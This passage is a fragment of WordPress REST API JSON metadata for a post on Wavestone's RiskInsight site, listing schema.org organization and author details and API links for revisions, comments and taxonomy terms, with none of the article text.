consultants","publisher":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.riskinsight-wavestone.com\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization","name":"Wavestone","url":"https:\/\/www.riskinsight-wavestone.com\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/","url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png","contentUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png","width":50,"height":50,"caption":"Wavestone"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/66dda0a265d60d65e7a8a3e373ccd8b6","name":"Bilal Benseddiq","url":"https:\/\/www.riskinsight-wavestone.com\/en\/author\/bilal-benseddiq\/"}]}},"_links":{"self":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/15728","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/users\/1418"}],"replies":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/comments?post=15728"}],"version-history":[{"count":6,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/15728\/revisions"}],"predecessor-version":[{"id":19741,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/15728\/revisions\/19741"}],"wp:attachment":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/media?parent=15728"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/categories?post=15728"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/tags?post=15728"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/coauthors?post=15728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}